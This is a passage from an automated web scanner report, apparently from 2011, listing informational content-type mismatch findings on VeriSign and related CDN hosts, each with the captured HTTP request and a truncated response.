GET /w0NmJhMTqAVBik2-mvMAlw7lBOLLrNpG/CG0C0Y8fUuCDotziFhxJgLZO7aYuQRy7 HTTP/1.1 Host: ak.c.ooyala.com Proxy-Connection: keep-alive Referer: http://player.ooyala.com/static/cacheable/d2ac0151cf5faecb401182d187b5c9e8/player_v2.swf User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=131238736.759487282.1315547307.1315547307.1315547307.1; __utmz=131238736.1315547307.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); _mkto_trk=id:447-EQK-225&token:_mch-ooyala.com-1315547307468-28819
Response
HTTP/1.1 200 OK x-amz-id-2: 2C0Xja9JcWvdZkdFgY46HvgLzrDh3/uV5ZIHpKbfgaV7B82NKulzZhMLCgKLiUEC x-amz-request-id: 2C289606F85CA6E8 Last-Modified: Wed, 24 Mar 2010 20:46:05 GMT ETag: "e296438fa374f5ed59656563980763eb" Accept-Ranges: bytes Content-Type: text/plain Content-Length: 285 Server: AmazonS3 Cache-Control: max-age=604800 Date: Fri, 09 Sep 2011 21:26:10 GMT Connection: close ...[SNIP]...
23.2. http://cdn.verisign.com/assets/fonts/samd____-webfont.woff
Summary
Severity: Information
Confidence: Firm
Host: http://cdn.verisign.com
Path: /assets/fonts/samd____-webfont.woff
Issue detail
The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain unrecognised content.
Request
GET /assets/fonts/samd____-webfont.woff HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/code-signing/index.html?tid=a_box User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=6A3B7886DB2A10DB4D019F6CAED9DACC; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.6.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719
Response
HTTP/1.1 200 OK Server: Apache ETag: "2ef819b-7544-4a59eedb01b80" Accept-Ranges: bytes Content-Type: text/html Age: 3152 Date: Fri, 09 Sep 2011 21:27:10 GMT Last-Modified: Mon, 13 Jun 2011 21:51:58 GMT Expires: Sun, 09 Oct 2011 13:52:54 GMT Content-Length: 30020 Connection: keep-alive wOFF...[SNIP]...
23.3. http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg
Summary
Severity: Information
Confidence: Firm
Host: http://cdn.verisign.com
Path: /authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg
Issue detail
The response contains the following Content-type statement: Content-Type: image/jpeg. The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.
Request
GET /authweb/en_ch/assets/header/images/en_ch_partners-featured-ssl-promo.jpg HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Server: Apache ETag: "29304a9-3c47-49d8465fa77c0" Accept-Ranges: bytes Content-Type: image/jpeg Age: 27502 Date: Fri, 09 Sep 2011 21:25:05 GMT Last-Modified: Wed, 02 Mar 2011 18:51:19 GMT Expires: Sun, 09 Oct 2011 13:46:43 GMT Content-Length: 15431 Connection: keep-alive GIF89a...[SNIP]...
23.4. http://cdn.verisign.com/authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg
Summary
Severity: Information
Confidence: Firm
Host: http://cdn.verisign.com
Path: /authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg
Issue detail
The response contains the following Content-type statement: Content-Type: image/jpeg. The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.
Request
GET /authweb/en_ch/assets/header/images/en_ch_ps-freetrial-promo.jpg HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Server: Apache ETag: "29304aa-381d-49d8465fa77c0" Accept-Ranges: bytes Content-Type: image/jpeg Age: 27502 Date: Fri, 09 Sep 2011 21:25:05 GMT Last-Modified: Wed, 02 Mar 2011 18:51:19 GMT Expires: Sun, 09 Oct 2011 13:46:43 GMT Content-Length: 14365 Connection: keep-alive GIF89a...[SNIP]...
23.5. http://cdn.verisign.com/authweb/en_ch/assets/shared/js/google-analytics.js
Summary
Severity: Information
Confidence: Firm
Host: http://cdn.verisign.com
Path: /authweb/en_ch/assets/shared/js/google-analytics.js
Issue detail
The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/en_ch/assets/shared/js/google-analytics.js HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/contact-information/index.html?tid=footer User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=check#true#1315621577|session#1315621455064-973488#1315623377|PC#1315621455064-973488.19#1378693517
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Content-Type: text/html Vary: Accept-Encoding Age: 27500 Date: Fri, 09 Sep 2011 21:25:03 GMT Expires: Sun, 09 Oct 2011 13:46:43 GMT Content-Length: 460 Connection: keep-alive var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-295855-1']); _gaq.push(['_setDomainName', '.verisign.ch']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('scri...[SNIP]...
23.6. http://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
Summary
Severity: Information
Confidence: Firm
Host: http://cdn.verisign.com
Path: /authweb/global/assets/shared/js/jquery.cacheimage.js
Issue detail
The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.ch/trust-seal/index.html?tid=gnps User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.3.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621628|session#1315621455064-973488#1315623428|PC#1315621455064-973488.19#1378693568
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Content-Type: text/html Vary: Accept-Encoding Age: 73854 Date: Fri, 09 Sep 2011 21:25:44 GMT Expires: Sun, 09 Oct 2011 18:24:34 GMT Content-Length: 1356 Connection: keep-alive /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plugin can be used to eliminate flashes of unstyled content (FOUC) and * improve perceived...[SNIP]...
23.7. http://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
Summary
Severity: Information
Confidence: Firm
Host: http://cdn.verisign.com
Path: /authweb/global/assets/shared/js/shared.js
Issue detail
The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/shared/js/shared.js HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://query.verisign.com/search?q=xss&site=vrsn&client=vrsn_frontend&output=xml_no_dtd&proxystylesheet=vrsn_frontend User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; mbox=check#true#1315621567|session#1315621455064-973488#1315623367|PC#1315621455064-973488.19#1378693507; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.2.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Response
HTTP/1.1 200 OK Server: Apache X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Content-Type: text/html Vary: Accept-Encoding Age: 69510 Date: Fri, 09 Sep 2011 21:24:45 GMT Expires: Sun, 09 Oct 2011 05:58:30 GMT Content-Length: 37327 Connection: keep-alive // FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plug...[SNIP]...
23.8. http://cdn.verisign.com/stellent/groups/public/documents/image/dev041741.jpg
Summary
Severity: Information
Confidence: Firm
Host: http://cdn.verisign.com
Path: /stellent/groups/public/documents/image/dev041741.jpg
Issue detail
The response contains the following Content-type statement: Content-Type: image/jpeg. The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.
Request
GET /stellent/groups/public/documents/image/dev041741.jpg HTTP/1.1 Host: cdn.verisign.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/partners/ssl-reseller-programs/index.html User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); mbox=session#1315621455064-973488#1315623583|PC#1315621455064-973488.19#1378693723|check#true#1315621783
Response
HTTP/1.1 200 OK Server: Apache ETag: "690418-c9f-49a38f3161780" Accept-Ranges: bytes Content-Type: image/jpeg Date: Fri, 09 Sep 2011 21:28:14 GMT Last-Modified: Wed, 19 Jan 2011 20:34:54 GMT Expires: Sun, 09 Oct 2011 19:44:53 GMT Content-Length: 3231 Connection: keep-alive GIF89a..9.....dz.Ki.e|.....7........".r............D....z........Hd....../22....Ti......iii.)Q...............}}}.....A........+...aaa.....JKK...XXX.$..*J.......q.................Rr........).......f{....[SNIP]...
23.9. https://cdn.verisign.com/authweb/en_us/assets/shared/js/google-analytics.js
Summary
Severity: Information
Confidence: Firm
Host: https://cdn.verisign.com
Path: /authweb/en_us/assets/shared/js/google-analytics.js
Issue detail
The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/en_us/assets/shared/js/google-analytics.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:52 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 69191 Expires: Sun, 09 Oct 2011 02:25:41 GMT Content-Length: 461 var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-295855-1']); _gaq.push(['_setDomainName', '.verisign.com']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('scr...[SNIP]...
23.10. https://cdn.verisign.com/authweb/global/assets/header/js/flyouts.js
Summary
Severity: Information
Confidence: Firm
Host: https://cdn.verisign.com
Path: /authweb/global/assets/header/js/flyouts.js
Issue detail
The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/header/js/flyouts.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 13 Expires: Sun, 09 Oct 2011 21:38:30 GMT Content-Length: 8048 //----------------------------------------// // My Account M-flyout form functionality //----------------------------------------// $("#myacc_search_btn").click(function(){ //document.get...[SNIP]...
23.11. https://cdn.verisign.com/authweb/global/assets/header/js/header.js
Summary
Severity: Information
Confidence: Firm
Host: https://cdn.verisign.com
Path: /authweb/global/assets/header/js/header.js
Issue detail
The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/header/js/header.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:43 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 13 Expires: Sun, 09 Oct 2011 21:38:30 GMT Content-Length: 1558 /******************************************* ** Header functions ** *******************************************/ //----------------------------------------// //Load Defaults when DOM i...[SNIP]...
23.12. https://cdn.verisign.com/authweb/global/assets/header/js/jquery.autocomplete.js
Summary
Severity: Information
Confidence: Firm
Host: https://cdn.verisign.com
Path: /authweb/global/assets/header/js/jquery.autocomplete.js
Issue detail
The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/header/js/jquery.autocomplete.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:44 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 14 Expires: Sun, 09 Oct 2011 21:38:30 GMT Content-Length: 22148 /* * jQuery Autocomplete plugin 1.1 * * Copyright (c) 2009 J..rn Zaefferer * * Dual licensed under the MIT and GPL licenses: * http://www.opensource.org/licenses/mit-license.php * ht...[SNIP]...
23.13. https://cdn.verisign.com/authweb/global/assets/home/js/home.js
Summary
Severity: Information
Confidence: Firm
Host: https://cdn.verisign.com
Path: /authweb/global/assets/home/js/home.js
Issue detail
The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/home/js/home.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:48 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 16 Expires: Sun, 09 Oct 2011 21:38:32 GMT Content-Length: 2725 /******************************************* ** HP specific functions ** *******************************************/ //External link functionality $('a[rel="external"]').click(funct...[SNIP]...
23.14. https://cdn.verisign.com/authweb/global/assets/shared/js/global-preload.js
Summary
Severity: Information
Confidence: Firm
Host: https://cdn.verisign.com
Path: /authweb/global/assets/shared/js/global-preload.js
Issue detail
The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain CSS.
Request
GET /authweb/global/assets/shared/js/global-preload.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 69230 Expires: Sun, 09 Oct 2011 02:24:38 GMT Content-Length: 135518 // FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.js /*! * jQuery JavaScript Library v1.4.4 * http://jquery.com/ * * Copyright 2010, John Resig * Dual licensed under the M...[SNIP]...
23.15. https://cdn.verisign.com/authweb/global/assets/shared/js/google-analytics.js
Summary
Severity: Information
Confidence: Firm
Host: https://cdn.verisign.com
Path: /authweb/global/assets/shared/js/google-analytics.js
Issue detail
The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/shared/js/google-analytics.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:28 GMT Content-Length: 471 var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-295855-1']); _gaq.push(['_setDomainName', '.verisign.com']); _gaq.push(['_trackPageview']); (function() { var ga = document.createElemen...[SNIP]...
23.16. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.boxshadow.js
Summary
Severity: Information
Confidence: Firm
Host: https://cdn.verisign.com
Path: /authweb/global/assets/shared/js/jquery.boxshadow.js
Issue detail
The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/shared/js/jquery.boxshadow.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:27 GMT Content-Length: 1538 /* ** * jquery-boxshadow.js * * $(object).boxshadow({ * hOffset : 3, * vOffset : 3, * shadowblur : 3, * color : '#808080' * }) * * If you are using this with IE, you should s...[SNIP]...
23.17. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js
Summary
Severity: Information
Confidence: Firm
Host: https://cdn.verisign.com
Path: /authweb/global/assets/shared/js/jquery.cacheimage.js
Issue detail
The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/shared/js/jquery.cacheimage.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 1 Expires: Sun, 09 Oct 2011 21:38:26 GMT Content-Length: 1356 /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plugin can be used to eliminate flashes of unstyled content (FOUC) and * improve perceived...[SNIP]...
23.18. https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.hover_intent.js
Summary
Severity: Information
Confidence: Firm
Host: https://cdn.verisign.com
Path: /authweb/global/assets/shared/js/jquery.hover_intent.js
Issue detail
The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/shared/js/jquery.hover_intent.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 39037 Expires: Sun, 09 Oct 2011 10:47:51 GMT Content-Length: 1614 /** * hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+ * <http://cherne.net/brian/resources/jquery.hoverIntent.html> * * @param f onMouseOver function || An object with configuration options * @p...[SNIP]...
23.19. https://cdn.verisign.com/authweb/global/assets/shared/js/oo-engine.js
Summary
Severity: Information
Confidence: Firm
Host: https://cdn.verisign.com
Path: /authweb/global/assets/shared/js/oo-engine.js
Issue detail
The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/shared/js/oo-engine.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:28 GMT Content-Length: 1154 /* OnlineOpinion (S3tS v3.1) */ /* This product and other products of OpinionLab, Inc. are protected by U.S. Patent No. 6606581, 6421724, 6785717 B1 and other patents pending. */ var custom_var,...[SNIP]...
23.20. https://cdn.verisign.com/authweb/global/assets/shared/js/rotator.js
Summary
Severity: Information
Confidence: Firm
Host: https://cdn.verisign.com
Path: /authweb/global/assets/shared/js/rotator.js
Issue detail
The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/shared/js/rotator.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Age: 77341 Expires: Sun, 09 Oct 2011 00:09:34 GMT Content-Length: 4102 var activeBannerId = ""; var activeBannerControllerId = ""; var activeTipId = ""; var rotate = true; var myBannerNumber = 1; var activeBannerNumber = myBannerNumber; var bannerItemsLength = $(...[SNIP]...
23.21. https://cdn.verisign.com/authweb/global/assets/shared/js/shared.js
Summary
Severity: Information
Confidence: Firm
Host: https://cdn.verisign.com
Path: /authweb/global/assets/shared/js/shared.js
Issue detail
The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /authweb/global/assets/shared/js/shared.js HTTP/1.1 Host: cdn.verisign.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: EdgePrismSSL Date: Fri, 09 Sep 2011 21:38:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.13 Cache-Control: max-age=2592000, public Expires: Sun, 09 Oct 2011 21:38:29 GMT Content-Length: 37327 // FROM: https://cdn.verisign.com/authweb/global/assets/shared/js/jquery.cacheimage.js /* * cacheImage: a jQuery plugin * * cacheImage is a simple jQuery plugin for pre-caching images. The * plug...[SNIP]...
23.22. https://cert.webtrust.org/ViewSeal
Summary
Severity: Information
Confidence: Firm
Host: https://cert.webtrust.org
Path: /ViewSeal
Issue detail
The response contains the following Content-type statement: The response states that it contains HTML. However, it actually appears to contain plain text.
Request
GET /ViewSeal HTTP/1.1 Host: cert.webtrust.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 20:14:30 GMT Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector) X-Cache: MISS from cert.webtrust.org Connection: close Content-Type: text/html Content-Length: 2834 java.lang.NumberFormatException: null at java.lang.Integer.parseInt(Integer.java:394) at java.lang.Integer.parseInt(Integer.java:476) at ca.cica.servlets.WebContext.getFormInt(WebContext.java:29) ...[SNIP]...
23.23. http://com-verisign.netmng.com/
Summary
Severity: Information
Confidence: Firm
Host: http://com-verisign.netmng.com
Path: /
Issue detail
The response contains the following Content-type statement:
Content-Type: text/html; charset=UTF-8
The response states that it contains HTML. However, it actually appears to contain script.
Request
GET /?async=1&ref= HTTP/1.1 Host: com-verisign.netmng.com Proxy-Connection: keep-alive Referer: http://www.verisign.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: u=78646006-8f5c-4a4b-87b8-c0cb592c83ce; cdb0=1.115936731645.5075.231152664.7153855158.0; cdbp=0,42,0; cdb1=; cdb2=; cdb3=; EVO5_OPT=1; evo5_VERISIGN=xep22ngsyerii%7CzPCBedpYRoO6OzhXoTF9q%2FaQjQpstH0WqFCxsh5%2B48J3547ECvJaebMq81oWRc3MP36Ne8FDKqi2tKvM0qAtvn5eUZVLjXQuMBCzsj9xlU6q8vkojmNUdsxdhJSq0RYJ%2FgEF5%2FA69puw0HLQJ9EPXM6sL1Ue6IGucoZYZgTJQnZo9CTdABHM4ueiLU%2FDJA8GIJKj5bIIOmyH%2FBCLQ0VIEg%3D%3D
Response
HTTP/1.1 200 OK Date: Fri, 09 Sep 2011 21:24:39 GMT Server: Apache/2.2.9 P3P: policyref="http://com-verisign.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV" Expires: Wed, 07 Sep 2011 21:24:39 GMT Last-Modified: Wed, 07 Sep 2011 21:24:39 GMT Cache-Control: no-store, no-cache, must-revalidate Cache-Control: post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: evo5_VERISIGN=xep22ngsyerii%7ChA01%2FrwSc8JE1KL%2BNF3RVTo25kmnDoHeqB4wQZyhagZZu%2F%2BudZozezKeJLE7KBK%2BUjUxXlIeDROFZHLovHD35a7MzKnV4tnniULPz80oJzXTjZCQuH3rEYszto4j5kdWKlao%2B92ozzrCF1iFudKJH42aETL2etzFNY%2F7zPIZWcbiqGvcagHruGjsS4FSqBNpnzLrgd77H3EQG8j%2FXWqODQ%3D%3D; expires=Sat, 10-Mar-2012 21:24:39 GMT; path=/ Content-Length: 3418 Connection: close Content-Type: text/html; charset=UTF-8 function json_encode(expr){var str='';switch(typeof(expr)){case"object":if(expr==null){str="null"}else if(expr.constructor==Date){str="\""+expr.getFullYear()+"-"+String(exp.getMonth()+100).substr(1)+"...[SNIP]...
23.24. https://fileconnect.symantec.com/images/Sigstand.jpg
Summary
Severity: Information
Confidence: Firm
